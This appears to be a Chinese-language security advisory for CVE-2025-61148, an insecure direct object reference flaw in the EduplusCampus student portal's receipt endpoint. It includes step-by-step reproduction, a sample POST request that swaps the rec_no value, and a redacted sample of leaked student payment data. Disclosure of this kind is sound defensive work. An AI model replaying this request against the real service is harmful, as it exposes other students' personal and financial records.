该漏洞存在于学生支付API中。应用程序未能正确验证请求收据的用户是否有权查看该收据。通过修改API请求中的rec_no参数,攻击者可以访问其他用户的收据。
CVE ID: CVE-2025-61148
漏洞类型: 不安全的直接对象引用(IDOR)
受影响产品: EduplusCampus
受影响端点: /student/get-receipt
研究人员: Vinay Sharma
在EduplusCampus学生门户(版本3.0.1)中发现了一个严重的不安全的直接对象引用(IDOR)漏洞。该漏洞允许经过身份验证的用户通过修改API请求中的rec_no参数来访问其他学生的敏感个人和财务记录。
成功利用该漏洞可使攻击者获取:
应用程序未能正确验证请求支付收据的用户的授权。rec_no参数是顺序的或可猜测的,服务器会返回所请求编号的收据详情,而不检查该收据是否属于当前登录用户。
/student/get-receipt 的POST请求。rec_no 参数。rec_no 的值修改为另一个有效的收据编号(例如,将 PCUF-232025 改为 PCUF-231824)。
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>
{
"rec_no": "PCUF-233012"
}
### 泄露数据示例:
{
"fullname": "REDACTED_NAME",
"rollno": "CSE2019XXX",
"component_total_amount": 55000.0,
"trans_list": [
{
"date": "21-Oct-2024",
"mode": "Online",
"amount": 55000.0,
"tid": "42951XXXX"
}
]
}